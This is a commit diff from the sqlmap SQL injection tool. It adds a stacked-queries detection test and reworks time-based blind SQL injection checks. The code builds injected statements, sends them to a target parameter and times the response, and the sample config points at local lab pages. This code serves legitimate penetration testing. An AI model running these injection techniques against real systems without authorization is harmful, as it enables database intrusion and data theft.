Added support to test for stacked queries support and improved check for time based blind sql injection.

Minor bug fix in --save option
This commit is contained in:
Bernardo Damele 2008-12-16 21:30:24 +00:00
parent bf2a857b9a
commit 05a8c8d3bf
9 changed files with 156 additions and 23 deletions

View File

@ -33,6 +33,7 @@ from lib.core.exception import sqlmapUnsupportedDBMSException
from lib.core.settings import SUPPORTED_DBMS from lib.core.settings import SUPPORTED_DBMS
from lib.techniques.blind.timebased import timeTest from lib.techniques.blind.timebased import timeTest
from lib.techniques.inband.union.test import unionTest from lib.techniques.inband.union.test import unionTest
from lib.techniques.outband.stacked import stackedTest
def action(): def action():
@ -70,6 +71,9 @@ def action():
print "%s\n" % conf.dbmsHandler.getFingerprint() print "%s\n" % conf.dbmsHandler.getFingerprint()
# Techniques options # Techniques options
if conf.stackedTest:
dumper.string("stacked queries support", stackedTest())
if conf.timeTest: if conf.timeTest:
dumper.string("time based blind sql injection payload", timeTest()) dumper.string("time based blind sql injection payload", timeTest())

View File

@ -613,6 +613,7 @@ def __setKnowledgeBaseAttributes():
kb.injType = None kb.injType = None
kb.parenthesis = None kb.parenthesis = None
kb.resumedQueries = {} kb.resumedQueries = {}
kb.stackedTest = None
kb.targetUrls = set() kb.targetUrls = set()
kb.timeTest = None kb.timeTest = None
kb.unionComment = "" kb.unionComment = ""
@ -656,6 +657,8 @@ def __saveCmdline():
elif datatype in ( "integer", "float" ): elif datatype in ( "integer", "float" ):
if option in ( "threads", "verbose" ): if option in ( "threads", "verbose" ):
value = "1" value = "1"
elif option == "timeout":
value = "10"
else: else:
value = "0" value = "0"
elif datatype == "string": elif datatype == "string":

View File

@ -45,7 +45,7 @@ optDict = {
"proxy": "string", "proxy": "string",
"threads": "integer", "threads": "integer",
"delay": "float", "delay": "float",
"timeout": "int", "timeout": "float",
}, },
"Injection": { "Injection": {
@ -60,6 +60,7 @@ optDict = {
}, },
"Techniques": { "Techniques": {
"stackedTest": "boolean",
"timeTest": "boolean", "timeTest": "boolean",
"unionTest": "boolean", "unionTest": "boolean",
"unionUse": "boolean", "unionUse": "boolean",

View File

@ -153,10 +153,14 @@ def cmdLineParser():
"the affected parameter(s) rather than using " "the affected parameter(s) rather than using "
"the default blind SQL injection technique.") "the default blind SQL injection technique.")
techniques.add_option("--stacked-test", dest="stackedTest",
action="store_true",
help="Test for stacked queries (multiple "
"statements) support")
techniques.add_option("--time-test", dest="timeTest", techniques.add_option("--time-test", dest="timeTest",
action="store_true", action="store_true",
help="Test for Time based blind SQL injection") help="Test for Time based blind SQL injection")
techniques.add_option("--union-test", dest="unionTest", techniques.add_option("--union-test", dest="unionTest",
action="store_true", action="store_true",
help="Test for UNION query (inband) SQL injection") help="Test for UNION query (inband) SQL injection")

View File

@ -322,21 +322,15 @@ def getValue(expression, blind=True, inband=True, fromUser=False, expected=None)
return value return value
def goStacked(expression, timeTest=False): def goStacked(expression):
""" """
TODO: write description TODO: write description
""" """
comment = queries[kb.dbms].comment comment = queries[kb.dbms].comment
query = agent.prefixQuery("; %s" % expression) query = agent.prefixQuery("; %s" % expression)
query = agent.postfixQuery("%s; %s" % (query, comment)) query = agent.postfixQuery("%s;%s" % (query, comment))
payload = agent.payload(newValue=query) payload = agent.payload(newValue=query)
page = Request.queryPage(payload, content=True)
start = time.time() return payload, page
Request.queryPage(payload)
duration = int(time.time() - start)
if timeTest:
return (duration >= SECONDS, payload)
else:
return duration >= SECONDS

View File

@ -24,24 +24,62 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import time
from lib.core.agent import agent
from lib.core.data import kb from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
from lib.core.data import queries from lib.core.data import queries
from lib.core.settings import SECONDS from lib.core.settings import SECONDS
from lib.request import inject from lib.request import inject
from lib.request.connect import Connect as Request
def timeTest(): def timeTest():
infoMsg = "testing time based blind sql injection on parameter " infoMsg = "testing time based blind sql injection on parameter "
infoMsg += "'%s'" % kb.injParameter infoMsg += "'%s' with AND condition syntax" % kb.injParameter
logger.info(infoMsg) logger.info(infoMsg)
query = queries[kb.dbms].timedelay % SECONDS timeQuery = queries[kb.dbms].timedelay % SECONDS
timeTest = inject.goStacked(query, timeTest=True)
query = agent.prefixQuery(" AND %s" % timeQuery)
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
start = time.time()
_ = Request.queryPage(payload)
duration = int(time.time() - start)
if duration >= SECONDS:
infoMsg = "the parameter '%s' is affected by a time " % kb.injParameter
infoMsg += "based blind sql injection with AND condition syntax"
logger.info(infoMsg)
kb.timeTest = payload
if timeTest[0] == True:
kb.timeTest = timeTest[1]
else: else:
kb.timeTest = False warnMsg = "the parameter '%s' is not affected by a time " % kb.injParameter
warnMsg += "based blind sql injection with AND condition syntax"
logger.warn(warnMsg)
infoMsg = "testing time based blind sql injection on parameter "
infoMsg += "'%s' with stacked query syntax" % kb.injParameter
logger.info(infoMsg)
start = time.time()
payload, _ = inject.goStacked(timeQuery)
duration = int(time.time() - start)
if duration >= SECONDS:
infoMsg = "the parameter '%s' is affected by a time " % kb.injParameter
infoMsg += "based blind sql injection with stacked query syntax"
logger.info(infoMsg)
kb.timeTest = payload
else:
warnMsg = "the parameter '%s' is not affected by a time " % kb.injParameter
warnMsg += "based blind sql injection with stacked query syntax"
logger.warn(warnMsg)
kb.timeTest = False
return kb.timeTest return kb.timeTest

View File

@ -0,0 +1,25 @@
#!/usr/bin/env python
"""
$Id$
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
and Daniele Bellucci <daniele.bellucci@gmail.com>
sqlmap is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation version 2 of the License.
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
You should have received a copy of the GNU General Public License along
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
pass

View File

@ -0,0 +1,60 @@
#!/usr/bin/env python
"""
$Id$
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
and Daniele Bellucci <daniele.bellucci@gmail.com>
sqlmap is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation version 2 of the License.
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
You should have received a copy of the GNU General Public License along
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import time
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.settings import SECONDS
from lib.request import inject
def stackedTest():
infoMsg = "testing stacked queries support on parameter "
infoMsg += "'%s'" % kb.injParameter
logger.info(infoMsg)
query = queries[kb.dbms].timedelay % SECONDS
start = time.time()
payload, _ = inject.goStacked(query)
duration = int(time.time() - start)
if duration >= SECONDS:
infoMsg = "the web application supports stacked queries "
infoMsg += "on parameter '%s'" % kb.injParameter
logger.info(infoMsg)
kb.stackedTest = payload
else:
warnMsg = "the web application does not support stacked queries "
warnMsg += "on parameter '%s'" % kb.injParameter
logger.warn(warnMsg)
kb.stackedTest = False
return kb.stackedTest

View File

@ -3,8 +3,8 @@
# Target URL. # Target URL.
# Example: http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2 # Example: http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2
# PHP and MySQL (local) # PHP and MySQL (local)
#url = http://127.0.0.1/sqlmap/mysql/get_int.php?id=1 url = http://127.0.0.1/sqlmap/mysql/get_int.php?id=1
url = http://127.0.0.1/sqlmap/mysql/get_int_partialunion.php?id=1 #url = http://127.0.0.1/sqlmap/mysql/get_int_partialunion.php?id=1
# PHP and Oracle (local) # PHP and Oracle (local)
#url = http://127.0.0.1/sqlmap/oracle/get_int.php?id=1 #url = http://127.0.0.1/sqlmap/oracle/get_int.php?id=1
# PHP and PostgreSQL (local) # PHP and PostgreSQL (local)
@ -146,6 +146,10 @@ eRegexp =
[Techniques] [Techniques]
# Test for stacked queries (multiple statements) support.
# Valid: True or False
stackedTest = False
# Test for Time based blind SQL injection. # Test for Time based blind SQL injection.
# Valid: True or False # Valid: True or False
timeTest = False timeTest = False